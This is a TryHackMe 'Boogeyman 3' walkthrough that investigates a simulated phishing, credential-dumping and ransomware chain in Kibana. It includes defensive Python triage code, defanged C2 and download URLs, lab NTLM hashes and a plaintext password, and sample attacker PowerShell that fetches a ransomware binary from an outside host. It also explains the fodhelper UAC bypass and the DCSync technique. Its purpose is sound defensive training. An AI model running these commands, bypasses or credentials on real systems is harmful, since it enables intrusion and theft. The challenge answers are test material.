Boogey Man 3

TryHackMe Challenge Walkthrough

Challenge Overview

Boogeyman returns, stealthier than before. This time, the attacker compromises a user at Quick Logistics LLC and targets the CEO with a spear-phishing email. The stage 1 payload implants a malicious DLL, establishes persistence, and begins C2 communication. The attacker escalates privileges, dumps credentials using Mimikatz, performs lateral movement using harvested credentials, and finally reaches the Domain Controller (DC) to launch a ransomware attack.

You will investigate the entire attack chain using Kibana in an Elastic Stack environment.

Threat Analysis Summary

Analyst Summary Report

Incident Title

Boogeyman 3 – Multi-Stage Phishing to Ransomware

Category

Lateral Movement, Credential Access, Impact

Detection Source

Endpoint logs via Kibana (Elastic Agent)

Impact

Domain-wide compromise via staged malware, credential dumping, and ransomware deployment

Tools Used

  • Kibana

Chain Attack Overview

Initial Access

Malicious .hta file disguised as PDF, launched via mshta.exe

Execution

DLL payload executed via rundll32.exe, later stages via powershell.exe

Persistence

Scheduled task with daily execution at 6:00

Privilege Escalation

fodhelper.exe used to bypass UAC

Defense Evasion

No dedicated evasion tooling (log clearing, AV tampering) observed; the signed-binary proxying via mshta.exe and rundll32.exe and the fodhelper.exe UAC bypass double as evasion (ATT&CK files T1218 and T1548 under Defense Evasion)

Discovery

Recon with whoami, net.exe, PowerView, and share enumeration

Credential Access

mimikatz.exe used on two workstations and the domain controller

Lateral Movement

Remote PowerShell sessions to WKSTN-1327 via stolen credentials

Exfiltration

Not observed

Command & Control

HTTP connection from rundll32.exe (hosting review.dat) to 165.232.170.151:80

Impact

Ransomware dropped via PowerShell from public URL

MITRE ATT&CK Mapping

| Phase | ID | Technique | Description |
|---|---|---|---|
| Initial Access | T1204.002 | User Execution: Malicious File | .hta disguised as a PDF, executed via mshta.exe |
| Execution / Defense Evasion | T1218.005 | System Binary Proxy Execution: Mshta | mshta.exe runs the disguised HTA |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | PowerShell used to create the scheduled task and download tools |
| Execution / Defense Evasion | T1218.011 | System Binary Proxy Execution: Rundll32 | Malicious DLL (review.dat) executed via rundll32.exe |
| Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task | Task named review, daily at 6:00 |
| Privilege Escalation / Defense Evasion | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | fodhelper.exe used to escalate privileges |
| Discovery | T1087.002 | Account Discovery: Domain Account | PowerView and net.exe used for enumeration |
| Discovery | T1135 | Network Share Discovery | Invoke-ShareFinder used to locate accessible shares |
| Credential Access | T1003.001 | OS Credential Dumping: LSASS Memory | mimikatz.exe used on multiple machines |
| Credential Access | T1003.006 | OS Credential Dumping: DCSync | Mimikatz DCSync used on the domain controller |
| Credential Access | T1552.001 | Unsecured Credentials: Credentials In Files | Plaintext domain credentials read from IT_Automation.ps1 on a share |
| Lateral Movement | T1021.006 | Remote Services: Windows Remote Management | Stolen creds used to move via remote PowerShell (wsmprovhost.exe) |
| Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | HTTP connection to external IP on port 80 |
| Command and Control | T1105 | Ingress Tool Transfer | PowerView, Mimikatz and the ransomware binary downloaded over HTTP(S) |
| Impact | T1486 | Data Encrypted for Impact | Ransomware executed via downloaded binary |

Reference: MITRE ATT&CK (https://attack.mitre.org/)

Q & A

Q1: What is the PID of the process that executed the initial stage 1 payload?

First things first, set the date!
Open Kibana, go to the Discover tab, and set the time picker to August 29–30, 2023; that is the window the challenge logs cover, and an open-ended range will bury the chain in noise.

The initial access vector was a spear-phishing email whose attachment presents a "PDF", ProjectFinancialSummary_Q3.pdf, that is really an HTA.

Kibana Query:

ProjectFinancialSummary_Q3.pdf

To trace the execution chain, I added the following columns:

  • process.pid
  • process.parent.pid
  • process.name
  • process.command_line

From the logs, mshta.exe launches the disguised HTA on host WKSTN-0051 under the user evan.hutchinson, and its child processes (every record whose process.parent.pid equals the mshta.exe process.pid) are xcopy.exe, rundll32.exe and powershell.exe. The PID of that mshta.exe process is the answer.

Answer

6392
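If you would rather reconstruct the chain outside Kibana, say from an export of the Event ID 1 records, the same process.pid to process.parent.pid walk is a few lines of Python. This is an added example written for this edit, not code from the walkthrough or from TryHackMe. The records it runs on are constructed: the mshta.exe PID (6392), the host, the user and the child image names follow the walkthrough, while the other PIDs, the timestamps, the path the lure is launched from and the exact command lines are invented.

```python
"""Rebuild the stage-1 process chain from Sysmon Event ID 1 (process creation) records.

Added example, not code from the walkthrough or from TryHackMe. EVENTS is a
constructed sample: the mshta.exe PID (6392), host, user and child image names
follow the walkthrough; every other PID, the timestamps, the lure path and the
exact command lines are invented.
"""
from collections import defaultdict

EVENTS = [
    {"@timestamp": "2023-08-29T23:51:05.100Z", "host.name": "WKSTN-0051",
     "user.name": "evan.hutchinson", "process.pid": 4100, "process.parent.pid": 980,
     "process.name": "explorer.exe", "process.command_line": "C:\\Windows\\explorer.exe"},
    {"@timestamp": "2023-08-29T23:51:10.420Z", "host.name": "WKSTN-0051",
     "user.name": "evan.hutchinson", "process.pid": 6392, "process.parent.pid": 4100,
     "process.name": "mshta.exe",
     "process.command_line": '"C:\\Windows\\System32\\mshta.exe" D:\\ProjectFinancialSummary_Q3.pdf'},
    {"@timestamp": "2023-08-29T23:51:12.003Z", "host.name": "WKSTN-0051",
     "user.name": "evan.hutchinson", "process.pid": 6408, "process.parent.pid": 6392,
     "process.name": "xcopy.exe",
     "process.command_line": '"C:\\Windows\\System32\\xcopy.exe" /s /i /e /h D:\\review.dat '
                             'C:\\Users\\EVAN~1.HUT\\AppData\\Local\\Temp\\review.dat'},
    {"@timestamp": "2023-08-29T23:51:16.809Z", "host.name": "WKSTN-0051",
     "user.name": "evan.hutchinson", "process.pid": 6444, "process.parent.pid": 6392,
     "process.name": "rundll32.exe",
     "process.command_line": '"C:\\Windows\\System32\\rundll32.exe" D:\\review.dat,DllRegisterServer'},
    {"@timestamp": "2023-08-29T23:51:18.250Z", "host.name": "WKSTN-0051",
     "user.name": "evan.hutchinson", "process.pid": 6480, "process.parent.pid": 6392,
     "process.name": "powershell.exe",
     "process.command_line": "powershell.exe -NoProfile -Command Register-ScheduledTask -TaskName review"},
    {"@timestamp": "2023-08-29T23:51:20.000Z", "host.name": "WKSTN-0051",  # unrelated noise
     "user.name": "SYSTEM", "process.pid": 7010, "process.parent.pid": 980,
     "process.name": "svchost.exe", "process.command_line": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
]


def index_events(events):
    """Index records by PID and group child PIDs under their parent PID, oldest first."""
    by_pid = {e["process.pid"]: e for e in events}
    children = defaultdict(list)
    for e in sorted(events, key=lambda e: e["@timestamp"]):
        children[e["process.parent.pid"]].append(e["process.pid"])
    return by_pid, children


def find_pids(events, image_name):
    """All PIDs whose image name matches (case-insensitive), oldest first."""
    return [e["process.pid"] for e in sorted(events, key=lambda e: e["@timestamp"])
            if e["process.name"].lower() == image_name.lower()]


def process_chain(events, root_pid):
    """Depth-first walk from root_pid: list of (depth, pid, image name) in creation order."""
    by_pid, children = index_events(events)
    chain = []

    def walk(pid, depth):
        rec = by_pid.get(pid)
        if rec is None:  # PID only ever seen as a parent: no creation record in the window
            return
        chain.append((depth, pid, rec["process.name"]))
        for child in children.get(pid, []):
            walk(child, depth + 1)

    walk(root_pid, 0)
    return chain


def render_chain(events, root_pid):
    """Indented tree with command lines, the view you want in a report."""
    by_pid, _ = index_events(events)
    lines = []
    for depth, pid, name in process_chain(events, root_pid):
        lines.append(f"{'  ' * depth}{name} (pid {pid}): {by_pid[pid]['process.command_line']}")
    return "\n".join(lines)


if __name__ == "__main__":
    for pid in find_pids(EVENTS, "mshta.exe"):
        print(render_chain(EVENTS, pid))
```

One caveat before running this over a real export: Windows reuses PIDs, so over a day of logs key the index by (host, pid, creation time), or by Sysmon's process GUID, rather than by pid alone.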

Q2: The stage 1 payload attempted to implant a file to another location. What is the full command-line value of this execution?

The full command line tells us everything we need: it copies review.dat from the attacker-mounted D: drive into the user's Temp folder, addressed through the 8.3 short-name path (EVAN~1.HUT). The switches are worth knowing when you read xcopy in logs: /s and /e copy subdirectories (including empty ones), /h includes hidden and system files, and /i treats a non-existent destination as a directory instead of prompting.

Answer

"C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat

Q3: The implanted file was eventually used and executed by the stage 1 payload. What is the full command-line value of this execution?

Next up, the attacker gets rundll32.exe involved, the Swiss Army knife of malicious execution. It is still parented by mshta.exe, just to keep things consistent.

They launch review.dat directly from the mounted D: drive (not the Temp copy) and have rundll32 call its exported DllRegisterServer function. That export exists on any self-registering COM DLL, so it is a convenient, innocuous-looking entry point for rogue DLLs.

Answer

"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer

Q4: The stage 1 payload established a persistence mechanism. What is the name of the scheduled task created by the malicious script?

Because nothing says "I'm here to stay" like a scheduled task named after the very DLL you just dropped.

Right after executing review.dat, the attacker uses PowerShell to register a scheduled task that runs every day at 6:00 AM. It's subtle. Like using a chainsaw to pick a lock. The task name sits in the command line of the powershell.exe child of mshta.exe.

Answer

review

Q5: The execution of the implanted file inside the machine has initiated a potential C2 connection. What is the IP and port used by this connection? (format: IP:port)

We traced review.dat being loaded by rundll32.exe at 23:51:16.809 on 29 August.

We are looking for a network connection now, so switch to Sysmon Event ID 3 (network connection) and check what happened right after that timestamp.

Kibana Query:

event.provider : "Microsoft-Windows-Sysmon" and event.code : "3"

A second later, Sysmon Event ID 3 logs an outbound connection, because what's malware without phoning home?
Add process.pid, destination.ip and destination.port as columns so the connection is attributed to the rundll32.exe process and not to something else that happened to talk out at the same second; once you do, it's hard to miss: nearly all of its traffic heads to the same place. Subtlety not included.

(IP is defanged)

Answer

165[.]232[.]170[.]151:80
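The temporal join you do by eye in Discover (take the process start time, then look at the Event ID 3 records that follow it) is easy to make explicit. The following Python is an added example written for this edit, not code from the walkthrough: its events are constructed, with only the rundll32.exe start time and the 165.232.170.151:80 destination taken from the walkthrough, and the PIDs, the beacon timing and the unrelated connections invented.

```python
"""Correlate a process start (Sysmon Event ID 1) with the network connections
(Sysmon Event ID 3) the same process makes afterwards, then rank destinations.

Added example, not from the walkthrough. EVENTS is a constructed sample: the
rundll32.exe start time and the 165.232.170.151:80 destination follow the
walkthrough; PIDs, beacon timing and the other connections are invented.
"""
from collections import Counter
from datetime import datetime

EVENTS = [
    {"@timestamp": "2023-08-29T23:51:16.809Z", "event.code": "1", "process.pid": 6444,
     "process.name": "rundll32.exe"},
    {"@timestamp": "2023-08-29T23:51:17.640Z", "event.code": "3", "process.pid": 6444,
     "process.name": "rundll32.exe", "destination.ip": "165.232.170.151", "destination.port": 80},
    {"@timestamp": "2023-08-29T23:51:18.102Z", "event.code": "3", "process.pid": 1234,  # not ours
     "process.name": "svchost.exe", "destination.ip": "10.10.10.5", "destination.port": 445},
    {"@timestamp": "2023-08-29T23:51:22.710Z", "event.code": "3", "process.pid": 6444,
     "process.name": "rundll32.exe", "destination.ip": "165.232.170.151", "destination.port": 80},
    {"@timestamp": "2023-08-29T23:51:27.730Z", "event.code": "3", "process.pid": 6444,
     "process.name": "rundll32.exe", "destination.ip": "165.232.170.151", "destination.port": 80},
    {"@timestamp": "2023-08-29T23:51:30.001Z", "event.code": "3", "process.pid": 6444,
     "process.name": "rundll32.exe", "destination.ip": "203.0.113.10", "destination.port": 443},
    {"@timestamp": "2023-08-29T23:53:40.000Z", "event.code": "3", "process.pid": 6444,  # outside 60 s
     "process.name": "rundll32.exe", "destination.ip": "165.232.170.151", "destination.port": 80},
]


def parse_ts(value):
    """ECS timestamps as Kibana exports them: ISO 8601 with milliseconds, UTC."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%fZ")


def connections_after_start(events, pid, window_s=60.0):
    """(seconds after start, 'ip:port') for each Event ID 3 the PID logs within
    window_s of its own Event ID 1, sorted by time."""
    start = next(e for e in events if e["event.code"] == "1" and e["process.pid"] == pid)
    t0 = parse_ts(start["@timestamp"])
    hits = []
    for e in events:
        if e["event.code"] != "3" or e["process.pid"] != pid:
            continue
        delta = (parse_ts(e["@timestamp"]) - t0).total_seconds()
        if 0 <= delta <= window_s:
            hits.append((delta, f"{e['destination.ip']}:{e['destination.port']}"))
    return sorted(hits)


def rank_destinations(events, pid, window_s=60.0):
    """Most-contacted endpoints first; a beacon dominates this list."""
    return Counter(dest for _, dest in connections_after_start(events, pid, window_s)).most_common()


def defang(endpoint):
    """165.232.170.151:80 -> 165[.]232[.]170[.]151:80, safe to paste in a report."""
    return endpoint.replace(".", "[.]")


if __name__ == "__main__":
    for delta, dest in connections_after_start(EVENTS, 6444):
        print(f"+{delta:7.3f}s  {defang(dest)}")
    print("likely C2:", defang(rank_destinations(EVENTS, 6444)[0][0]))
```

Pinning the join on process.pid (or, better, on the process GUID) is what stops a coincidental svchost.exe connection in the same second from being blamed on review.dat.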

Q6: The attacker has discovered that the current access is a local administrator. What is the name of the process used by the attacker to execute a UAC bypass?

Now we search for review.dat on WKSTN-0051 and follow the process chain like responsible analysts pretending we don't already know where this is going.

After a quick warm-up with whoami and net.exe, the attacker pulls out fodhelper.exe.

Checking online, fodhelper.exe is a well-known UAC bypass: it is an auto-elevating Windows binary that reads a per-user registry key (HKCU\Software\Classes\ms-settings\shell\open\command) when it starts, so a medium-integrity process can plant a command there and have it run at high integrity with no prompt. It only works when the current user is already a local administrator, which is exactly what the attacker had just confirmed.

On MITRE ATT&CK we can find the technique:

  • T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control

So it's a classic LOLBin used for UAC bypass. Because when you're trying to stay sneaky, abusing trusted Windows tools is the way to go. The tell in the logs is fodhelper.exe spawning a child it has no business spawning (cmd.exe or powershell.exe).

Note: the last events in this chain also show a lateral-movement attempt using a plaintext credential and a Base64-encoded PowerShell command. The process with PID 6160 is the one to pivot on; filtering for processes chained to it shows what happens next.

The event log gets more interesting from here. PID 6160 kicks off a whole parade:

  • cmd.exe running whoami /all to verify access (or just to flex).
  • PowerView downloaded straight from GitHub. Nothing suspicious about that.
  • Mimikatz arrives for credential dumping, and out comes itadmin.
  • A bit of network recon with Invoke-ShareFinder.
  • Browsing remote shares like it's a mapped drive from 2003.
  • Pulls IT_Automation.ps1 from \\WKSTN-1327\ITFiles, because of course he does.
  • Uses the harvested creds to hop onto WKSTN-1327 like it's a hotel room.
  • And finally, kicks off another plaintext-credential, encoded-command lateral-movement attempt from the new host.

All this, just because someone opened a malicious PDF-that's-actually-an-HTA.

Answer

fodhelper.exe
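The encoded and plaintext-credential commands mentioned in the note above are worth triaging systematically, because the same pattern repeats on WKSTN-1327 and DC01 (the downloads in Q7 and Q15, the credential in Q10). The Python below is an added example written for this edit, not the walkthrough's own code: it decodes -EncodedCommand payloads and pulls credentials, remote targets and URLs out of PowerShell command lines. The three sample command lines are constructed; the credential, the target host and the URL inside them are the ones this walkthrough reports, but the surrounding syntax is invented.

```python
"""Triage PowerShell command lines: decode -EncodedCommand payloads, then pull
plaintext credentials, remote targets and download URLs out of the visible text.

Added example, not from the walkthrough. SAMPLE_COMMAND_LINES are constructed:
the credential, target host and URL follow the walkthrough, the syntax around
them is invented.
"""
import base64
import re


def _b64_utf16le(text):
    """powershell -EncodedCommand takes Base64 of the UTF-16LE bytes of the script."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -e " + _b64_utf16le("whoami /all"),
    "powershell.exe -c \"$p = ConvertTo-SecureString 'Tr!ckyP@ssw0rd987' -AsPlainText -Force; "
    "$c = New-Object System.Management.Automation.PSCredential('QUICKLOGISTICS\\allan.smith', $p); "
    "Invoke-Command -ComputerName WKSTN-1327 -Credential $c -ScriptBlock { whoami }\"",
    "powershell.exe -c \"Invoke-WebRequest -Uri http://ff.sillytechninja.io/ransomboogey.exe "
    "-OutFile C:\\Windows\\Temp\\ransomboogey.exe\"",
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# -ep / -exec (ExecutionPolicy) must not match, hence the explicit alternatives.
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/]+=*)", re.I)
SECURESTRING_RE = re.compile(r"ConvertTo-SecureString\s+['\"]([^'\"]+)['\"]\s+-AsPlainText", re.I)
PSCREDENTIAL_RE = re.compile(r"PSCredential\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
COMPUTERNAME_RE = re.compile(r"-ComputerName\s+['\"]?([\w.-]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded script, or None when there is no valid -EncodedCommand."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad padding, non-Base64 text or an odd byte count
        return None


def triage(cmdline):
    """Decode first, then scan both the raw and the decoded text for the artefacts."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    user = PSCREDENTIAL_RE.search(text)
    password = SECURESTRING_RE.search(text)
    target = COMPUTERNAME_RE.search(text)
    return {
        "decoded": decoded,
        "credentials": (user.group(1), password.group(1)) if user and password else None,
        "target_host": target.group(1) if target else None,
        "urls": URL_RE.findall(text),
    }


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(triage(line))
```

Scanning the decoded text as well as the raw command line matters: an attacker who wraps the Invoke-Command in -EncodedCommand hides the credential and the target from a plain string search, but not from this.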

Q7: Having a high privilege machine access, the attacker attempted to dump the credentials inside the machine. What is the GitHub link used by the attacker to download a tool for credential dumping?

If you guessed Mimikatz, congratulations, you've been here before.

Following the command chain from the previous question, the attacker decided it was time for some light credential theft and downloaded mimikatz_trunk.zip directly from the project's GitHub releases. Because if you're going to dump LSASS, you might as well do it with flair and an open-source license. The URL sits in the PowerShell command line, so process.command_line is the column to read.

Also, a shoutout to defenders who still allow unfiltered GitHub release downloads from workstations: you're making life a little easier for the bad guys. Blocking GitHub outright is rarely realistic, but powershell.exe fetching a release archive from github.com on a user workstation is an easy, high-signal alert.

(URL is defanged)

Answer

hxxps[://]github[.]com/gentilkiwi/mimikatz/releases/download/2[.]2[.]0-20220919/mimikatz_trunk[.]zip

Q8: After successfully dumping the credentials inside the machine, the attacker used the credentials to gain access to another machine. What is the username and hash of the new credential pair? (format: username:hash)

As expected, the Mimikatz run dumps logon credentials from LSASS. The IT admin's NTLM hash sits right there in the logs, as if it weren't about to be reused immediately for lateral movement.

Answer

itadmin:F84769D250EB95EB2D7D8B4A1C5613F2

Q9: Using the new credentials, the attacker attempted to enumerate accessible file shares. What is the name of the file accessed by the attacker from a remote share?

With shiny new creds in hand, the attacker launched Invoke-ShareFinder (from the PowerView module downloaded earlier) to scout the environment like a nosy neighbor with admin rights.

Soon enough, they landed on a file share and went straight for a suspicious-looking PowerShell script. Because if you’re going to dig, dig where it hurts.

Answer

IT_Automation.ps1

Q10: After getting the contents of the remote file, the attacker used the new credentials to move laterally. What is the new set of credentials discovered by the attacker? (format: username:password)

Apparently, IT_Automation.ps1 didn't just automate tasks; it also conveniently carried hardcoded credentials for a QUICKLOGISTICS domain account. Because who doesn't love storing plaintext passwords in scripts on a file share?

Answer

QUICKLOGISTICS\allan.smith:Tr!ckyP@ssw0rd987

Q11: What is the hostname of the attacker's target machine for its lateral movement attempt?

After grabbing the credentials, the attacker pivots to a new target machine — because why stop at one when you can have more?

From the logs, we see lateral activity directed toward a system identified as:

Answer

WKSTN-1327

Q12: Using the malicious command executed by the attacker from the first machine to move laterally, what is the parent process name of the malicious command executed on the second compromised machine?

To confirm the attacker’s activity on the second host, I filtered for:

Kibana Query:

agent.hostname:"WKSTN-1327" AND user.name:"allan.smith" 

Add a filter process.command_line : * (field exists) to keep only the events that carry a command line; it makes the reading easier.

That gave us a beautiful trace of remote command execution. The key detail? The malicious PowerShell was spawned under wsmprovhost.exe, the WinRM provider host. That parent is the fingerprint of remote PowerShell (Invoke-Command / Enter-PSSession): an interactive user gets powershell.exe under explorer.exe or cmd.exe, never under wsmprovhost.exe.

On the new host it's the same playbook again:

  • recon with whoami
  • another download of Mimikatz, and we know how that ends
Answer

wsmprovhost.exe
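To see the hop end-to-end rather than one host at a time, pair the Invoke-Command on the source host with the session it opens on the target: a process under wsmprovhost.exe, running as the user whose credential was supplied, within seconds of the source command. The Python below is an added example written for this edit, not the walkthrough's code, and its events are constructed: the hostnames, the user names and the wsmprovhost.exe parent follow the walkthrough, while the timestamps and the exact command lines are invented.

```python
"""Pair a WinRM lateral-movement command on the source host with the remote
session it opens on the target host (a process parented by wsmprovhost.exe).

Added example, not from the walkthrough. EVENTS is a constructed sample of
Sysmon Event ID 1 records from two hosts: hostnames, user names and the
wsmprovhost.exe parent follow the walkthrough; timestamps and command lines
are invented.
"""
import re
from datetime import datetime

EVENTS = [
    {"@timestamp": "2023-08-30T00:20:01.000Z", "host.name": "WKSTN-0051", "user.name": "evan.hutchinson",
     "process.name": "powershell.exe", "process.parent.name": "cmd.exe",
     "process.command_line": "powershell.exe -c \"Invoke-Command -ComputerName WKSTN-1327 -Credential "
                             "(New-Object PSCredential('QUICKLOGISTICS\\allan.smith', $p)) -ScriptBlock { whoami }\""},
    {"@timestamp": "2023-08-30T00:20:02.410Z", "host.name": "WKSTN-1327", "user.name": "allan.smith",
     "process.name": "wsmprovhost.exe", "process.parent.name": "svchost.exe",
     "process.command_line": "C:\\Windows\\System32\\wsmprovhost.exe -Embedding"},
    {"@timestamp": "2023-08-30T00:20:02.900Z", "host.name": "WKSTN-1327", "user.name": "allan.smith",
     "process.name": "powershell.exe", "process.parent.name": "wsmprovhost.exe",
     "process.command_line": "powershell.exe -c whoami"},
    {"@timestamp": "2023-08-30T00:20:03.000Z", "host.name": "WKSTN-1327", "user.name": "allan.smith",
     "process.name": "whoami.exe", "process.parent.name": "powershell.exe",
     "process.command_line": "whoami"},
    {"@timestamp": "2023-08-30T01:15:00.000Z", "host.name": "WKSTN-1327", "user.name": "allan.smith",
     "process.name": "powershell.exe", "process.parent.name": "explorer.exe",  # interactive, not remote
     "process.command_line": "powershell.exe"},
]

COMPUTERNAME_RE = re.compile(r"-ComputerName\s+['\"]?([\w.-]+)", re.I)
# PSCredential('DOMAIN\user', ...) -> user; the optional group swallows the domain prefix
CRED_USER_RE = re.compile(r"PSCredential\s*\(\s*['\"](?:[^'\"\\]+\\)?([^'\"\\]+)['\"]", re.I)
# wsmprovhost.exe hosts remote PowerShell sessions; whatever it spawns arrived over WinRM
REMOTE_PARENTS = {"wsmprovhost.exe"}


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%fZ")


def remote_session_children(events):
    """Processes started directly by the WinRM provider host."""
    return [e for e in events if e["process.parent.name"].lower() in REMOTE_PARENTS]


def lateral_movement_pairs(events, window_s=30.0):
    """(source host, target host, user, target command line) for every -ComputerName
    command that is followed within window_s by a wsmprovhost.exe child on that
    target, running as the user named in the supplied credential."""
    pairs = []
    for src in events:
        target = COMPUTERNAME_RE.search(src["process.command_line"])
        if not target:
            continue
        user_m = CRED_USER_RE.search(src["process.command_line"])
        user = user_m.group(1).lower() if user_m else src["user.name"].lower()
        t0 = parse_ts(src["@timestamp"])
        for dst in remote_session_children(events):
            if dst["host.name"].lower() != target.group(1).lower() or dst["user.name"].lower() != user:
                continue
            delta = (parse_ts(dst["@timestamp"]) - t0).total_seconds()
            if 0 <= delta <= window_s:
                pairs.append((src["host.name"], dst["host.name"], dst["user.name"], dst["process.command_line"]))
    return pairs


if __name__ == "__main__":
    for src_host, dst_host, user, cmd in lateral_movement_pairs(EVENTS):
        print(f"{src_host} -> {dst_host} as {user}: {cmd}")
```

The later interactive powershell.exe on WKSTN-1327 is deliberately in the sample: it runs as the same user but under explorer.exe, so it is not paired. In Elastic Agent data the equivalent is a Sysmon process-creation event whose process.parent.name is wsmprovhost.exe; match it against the winrm_agent logon on the target (Security 4624, logon type 3) if you want the session start without relying on a child process.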

Q13: The attacker then dumped the hashes in this second machine. What is the username and hash of the newly dumped credentials? (format: username:hash)

No surprises here — after Mimikatz showed up on the second host, we got our next set of stolen creds.

Just scrolling through the same command-line logs on WKSTN-1327, we find the juicy part:

  • Mimikatz runs (again)
  • Another dump appears, and voilà:
Answer

administrator:00f80f2538dcb54e7adc715c0e7091ec

Q14: After gaining access to the domain controller, the attacker attempted to dump the hashes via a DCSync attack. Aside from the administrator account, what account did the attacker dump?

Time to shift our focus to the DC01 host.

I checked online to be sure, and the common way to run a DCSync attack is Mimikatz: its lsadump::dcsync module asks the domain controller to replicate a named account's secrets, the same way a second DC would, so no LSASS access on the DC is needed.

Since DCSync attacks often involve Mimikatz, I filtered for events where the process name is mimikatz.exe on agent.hostname:DC01.

Kibana Query:

agent.hostname:"DC01" AND process.name: "mimikatz.exe"  

Sure enough, the logs show our attacker pulling password hashes like it's their birthday. The account being replicated is passed as the /user: argument, so the names to report are in process.command_line.

Answer

backupda

Q15: After dumping the hashes, the attacker attempted to download another remote file to execute ransomware. What is the link used by the attacker to download the ransomware binary?

Let's take a broader view of DC01 and check the PowerShell execution on it, since that's their favorite tool at this point.
We expect a download cmdlet such as Invoke-WebRequest to show up in the command line alongside the execution.

Kibana Query:

agent.hostname:"DC01" AND process.name: "powershell.exe" 

With control of the domain controller and a pocketful of hashes, our attacker moved on to the grand finale: ransomware.

And there it is — a nice, cozy Invoke-WebRequest pulling down something lovingly named ransomboogey.exe from a remote server. Totally normal behavior.

(URL is defanged)

Answer

hxxp[://]ff[.]sillytechninja[.]io/ransomboogey[.]exe

Conclusion

From fake PDFs to credential dumping and domain-wide ransomware — this one had it all. Our attacker used LOLBins like mshta, rundll32, and fodhelper to keep things subtle, until Mimikatz and PowerShell joined the party. Classic escalation. Classic mess.

The good news? The entire attack left a trail wide enough to follow in flip-flops. Assuming you’re looking, of course.

$ Whoami

Cybersecurity learner, log nerd, and TryHackMe badge hoarder. Let’s connect on LinkedIn before I get pulled into another packet capture.